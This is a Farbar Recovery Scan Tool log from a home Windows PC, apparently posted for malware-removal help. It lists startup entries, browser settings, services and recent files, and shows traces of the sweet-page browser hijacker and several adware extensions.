HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\Run: [Spotify Web Helper] => C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-03] (Spotify Ltd)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {496991f1-83b7-11e3-a045-406186b70622} - H:\autorun.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {6140cd31-99d4-11e3-ac34-406186b70622} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {efd7f59c-3f87-11e4-aca2-406186b70622} - F:\Startme.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-27] (Microsoft Corporation)
AppInit_DLLs: C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL => C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL File Not Found
AppInit_DLLs-x32: c:\progra~3\fastan~1\fastan~1.dll => "c:\progra~3\fastan~1\fastan~1.dll" File Not Found
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x6E8195E10142CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.sweet-pag...F1A80P6304P6304
SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
SearchScopes: HKLM - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
SearchScopes: HKLM-x32 - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
BHO: No Name -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll No File
BHO: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll No File
BHO-x32: UTubErAdBllockEr -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll No File
BHO-x32: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.dll No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: iSkysoft Video Converter Ultimate 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
Filter: text/xml - {807553E5-5146-11D5-A672-00B0D022E945} -  No File
 
FireFox:
========
FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
FF NewTab: hxxp://www.sweet-page.com/newtab/?type=nt&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
FF DefaultSearchEngine: sweet-page
FF SelectedSearchEngine: sweet-page
FF Homepage: hxxp://www.sweet-page.com/?type=hp&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/JavaPlugin,version=10.17.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @abr.gov.au/KeyMgmtPlugin -> C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml
FF Extension: Fast Start - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected] [2014-10-01]
FF Extension: UTubErAdBllockEr - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected] [2014-02-19]
FF Extension: RooboSaver - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected] [2014-03-24]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]
FF Extension: iSkysoft Video Converter Ultimate - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected] [2014-09-30]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]l.com] - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
FF Extension: No Name - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com [Not Found]
FF StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.sweet-pag...F1A80P6304P6304
 
Chrome: 
=======
CHR Profile: C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (SEOquake) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2014-03-24]
CHR Extension: (Google Docs) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-25]
CHR Extension: (Google Drive) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-25]
CHR Extension: (YouTube) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-25]
CHR Extension: (Google Search) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-25]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2014-04-21]
CHR Extension: (Google Wallet) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-25]
CHR StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://www.sweet-pag...F1A80P6304P6304
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BITCOMET_HELPER_SERVICE; C:\Program Files (x86)\BitComet\tools\BitCometService.exe [1296728 2013-11-29] (www.BitComet.com)
R2 Hamachi2Svc; D:\Games\LogMeIn Hamachi\hamachi-2.exe [2525008 2014-09-04] (LogMeIn Inc.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
S2 671c50b0; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserSystemEnahncerSvc.dll",service
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-01-23] (Disc Soft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-15 15:39 - 2014-10-15 15:41 - 00017171 _____ () C:\Users\Mitey Fresh\Downloads\FRST.txt
2014-10-15 15:39 - 2014-10-15 15:39 - 00000000 ____D () C:\FRST
2014-10-15 15:38 - 2014-10-15 15:38 - 02110464 _____ (Farbar) C:\Users\Mitey Fresh\Downloads\FRST64.exe
2014-10-15 15:36 - 2014-10-15 15:37 - 01101824 _____ (Farbar) C:\Users\Mitey Fresh\Downloads\FRST.exe
2014-10-14 21:36 - 2014-10-14 21:36 - 00000052 _____ () C:\Users\Mitey Fresh\Desktop\geoguesser.txt
2014-10-14 16:46 - 2014-10-14 16:46 - 00215754 _____ () C:\Users\Mitey Fresh\Desktop\OTL.Txt
2014-10-12 22:27 - 2014-10-15 08:56 - 00000347 _____ () C:\Users\Mitey Fresh\Desktop\cruise holiday.txt
2014-10-10 13:08 - 2014-10-10 15:14 - 00062372 _____ () C:\Users\Mitey Fresh\Downloads\Extras.Txt
2014-10-10 13:07 - 2014-10-14 16:34 - 00215754 _____ () C:\Users\Mitey Fresh\Downloads\OTL.Txt
2014-10-10 12:57 - 2014-10-10 12:58 - 00602112 _____ (OldTimer Tools) C:\Users\Mitey Fresh\Downloads\OTL.exe
2014-10-01 14:54 - 2014-10-01 14:54 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\SupTab
2014-10-01 14:52 - 2014-10-02 13:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\WinZip
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\ProgramData\WinZip
2014-10-01 14:51 - 2014-10-01 14:51 - 00002293 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2014-10-01 14:51 - 2014-10-01 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 14:50 - 2014-10-01 14:51 - 00000000 ____D () C:\Program Files\WinZip
2014-10-01 14:49 - 2014-10-01 14:49 - 00873680 _____ ( ) C:\Users\Mitey Fresh\Downloads\winzip18-home (2).exe
2014-10-01 14:06 - 2014-10-01 14:07 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (2).exe
2014-10-01 14:06 - 2014-10-01 14:06 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-10-01 13:00 - 2014-10-01 13:01 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-01 09:33 - 2014-09-25 13:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 09:33 - 2014-09-25 12:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-30 17:15 - 2014-10-09 09:03 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Mitey Shield video
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\iSkysoft
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:12 - 00000000 ____D () C:\ProgramData\iSkysoft Video Converter Ultimate
2014-09-30 17:06 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:06 - 00000000 ____D () C:\Program Files (x86)\iSkysoft
2014-09-30 17:06 - 2013-08-23 14:36 - 00721263 _____ () C:\Windows\SysWOW64\ISCM64.dll
2014-09-30 17:06 - 2013-08-07 15:31 - 00214528 _____ () C:\Windows\SysWOW64\ISCM32.dll
2014-09-30 17:05 - 2014-09-30 17:05 - 00000000 ____D () C:\Users\Public\Documents\iSkysoft
2014-09-30 17:04 - 2014-09-30 17:05 - 01347936 _____ (iSkysoft) C:\Users\Mitey Fresh\Downloads\video-converter-ultimate-win_setup_full670.exe
2014-09-29 21:19 - 2014-09-29 21:20 - 00262144 _____ () C:\Windows\Minidump\092914-17940-01.dmp
2014-09-29 19:47 - 2014-09-30 17:12 - 00076441 _____ () C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
2014-09-24 13:04 - 2014-09-10 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 13:04 - 2014-09-10 08:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-22 18:48 - 2014-09-29 16:37 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\vlc
2014-09-22 18:46 - 2014-09-22 18:47 - 00000000 ____D () C:\Program Files (x86)\VLC
2014-09-22 18:45 - 2014-09-22 18:46 - 24743106 _____ () C:\Users\Mitey Fresh\Downloads\vlc-2.1.5-win32.exe
2014-09-19 12:42 - 2014-09-19 12:42 - 00332782 _____ () C:\Users\Mitey Fresh\Downloads\export (9).wav
2014-09-19 12:40 - 2014-09-19 12:41 - 00383026 _____ () C:\Users\Mitey Fresh\Downloads\export (8).wav
2014-09-19 12:35 - 2014-09-19 12:35 - 00386092 _____ () C:\Users\Mitey Fresh\Downloads\169905__lauriesafari__reallyareyoukidding.wav
2014-09-19 12:22 - 2014-09-19 12:22 - 00354138 _____ () C:\Users\Mitey Fresh\Downloads\export (7).wav
2014-09-18 18:13 - 2014-09-18 18:13 - 00354690 _____ () C:\Users\Mitey Fresh\Downloads\export (6).wav
2014-09-18 18:08 - 2014-09-18 18:08 - 00353600 _____ () C:\Users\Mitey Fresh\Downloads\export (5).wav
2014-09-18 18:05 - 2014-09-18 18:05 - 00391048 _____ () C:\Users\Mitey Fresh\Downloads\export (4).wav
2014-09-18 18:02 - 2014-09-18 18:02 - 00353230 _____ () C:\Users\Mitey Fresh\Downloads\export (3).wav
2014-09-18 18:00 - 2014-09-18 18:00 - 00354016 _____ () C:\Users\Mitey Fresh\Downloads\export (2).wav
2014-09-18 17:58 - 2014-09-18 17:58 - 00570378 _____ () C:\Users\Mitey Fresh\Downloads\232115__tec-studios__electronic-pounding-sound-mono (1).wav
2014-09-18 17:50 - 2014-09-18 17:52 - 00469382 _____ () C:\Users\Mitey Fresh\Downloads\35622__fresco__running-water-tap-by-fresco.wav
2014-09-18 17:43 - 2014-09-18 17:43 - 00395790 _____ () C:\Users\Mitey Fresh\Downloads\export (1).wav
2014-09-18 17:01 - 2014-09-18 17:01 - 00354976 _____ () C:\Users\Mitey Fresh\Downloads\export.wav
2014-09-18 15:02 - 2014-09-18 15:02 - 00048140 _____ () C:\Users\Mitey Fresh\Downloads\50775__smcameron__drips2.ogg
2014-09-17 09:37 - 2014-09-26 13:08 - 00000004 _____ () C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
2014-09-17 09:22 - 2014-09-17 09:22 - 00000000 ____D () C:\ProgramData\Browser AdBlocker
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-15 15:28 - 2013-03-27 17:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-15 15:15 - 2014-02-25 16:36 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-15 15:15 - 2014-02-25 16:36 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-15 15:09 - 2014-03-06 10:57 - 00000598 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
2014-10-15 14:29 - 2013-03-26 15:55 - 01991666 _____ () C:\Windows\WindowsUpdate.log
2014-10-15 13:31 - 2013-03-18 19:16 - 00365056 _____ () C:\Users\Mitey Fresh\Desktop\Food diary.xls
2014-10-15 12:50 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 12:50 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-15 12:47 - 2009-07-14 16:13 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-15 12:43 - 2014-02-24 08:03 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\LogMeIn Hamachi
2014-10-15 12:43 - 2009-07-14 16:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-15 12:42 - 2009-07-14 15:51 - 00104495 _____ () C:\Windows\setupact.log
2014-10-12 22:10 - 2014-03-06 10:57 - 00003636 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000
2014-10-10 11:45 - 2013-08-08 12:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
2014-10-08 21:19 - 2011-07-29 11:08 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Kirra's
2014-10-08 16:29 - 2014-02-25 16:37 - 00002350 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-08 15:41 - 2014-07-03 20:30 - 00013312 ___SH () C:\Users\Mitey Fresh\Downloads\Thumbs.db
2014-10-03 21:35 - 2013-03-31 13:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Spotify
2014-10-03 21:30 - 2013-03-31 13:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\Spotify
2014-10-02 17:52 - 2013-03-29 14:54 - 00002547 _____ () C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
2014-10-02 09:44 - 2013-03-27 16:54 - 00233100 _____ () C:\Windows\PFRO.log
2014-10-01 19:06 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-01 14:52 - 2013-10-05 13:02 - 00001381 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-01 14:52 - 2013-03-26 16:47 - 00001647 _____ () C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-01 14:46 - 2009-07-14 16:32 - 00000000 ____D () C:\Windows\Offline Web Pages
2014-10-01 14:43 - 2014-07-05 18:01 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\PerformerSoft
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Malwarebytes
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-29 21:19 - 2013-03-28 16:08 - 433221317 _____ () C:\Windows\MEMORY.DMP
2014-09-29 21:19 - 2013-03-28 16:08 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 19:37 - 2013-04-29 18:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Skype
2014-09-25 09:42 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\rescache
2014-09-24 20:48 - 2013-03-27 17:06 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 20:48 - 2013-03-27 17:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-24 20:48 - 2013-03-27 17:06 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-22 17:42 - 2013-03-26 17:09 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-19 12:43 - 2013-05-28 17:24 - 00013824 _____ () C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-09-17 13:47 - 2014-08-08 11:25 - 00000000 ____D () C:\ProgramData\AApptoU
2014-09-17 09:41 - 2013-12-30 10:48 - 00000000 ____D () C:\ProgramData\9922f00edb3be824
2014-09-15 11:13 - 2014-09-13 12:28 - 00000000 ____D () C:\ProgramData\tperfecctcoupon
2014-09-15 11:13 - 2014-08-24 12:41 - 00000000 ____D () C:\ProgramData\grEatisaavIng
 
Some content of TEMP:
====================
C:\Users\Mitey Fresh\AppData\Local\Temp\BackupSetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\CloudBackup4644.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\mpsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\OutfoxTV_bg_silent_176.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\outlookset.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\PC_Performer_setup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\pixsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\ppadsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\prestall.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\Quarantine.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\speedupmypc.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\switchsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\uninst1.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\vcredist_x64.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\vcredist_x86.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-07 12:32
 
==================== End Of Log ============================
 
Here is the Addition.txt logfile:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-10-2014
Ran by Mitey Fresh at 2014-10-15 15:42:12
Running from C:\Users\Mitey Fresh\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
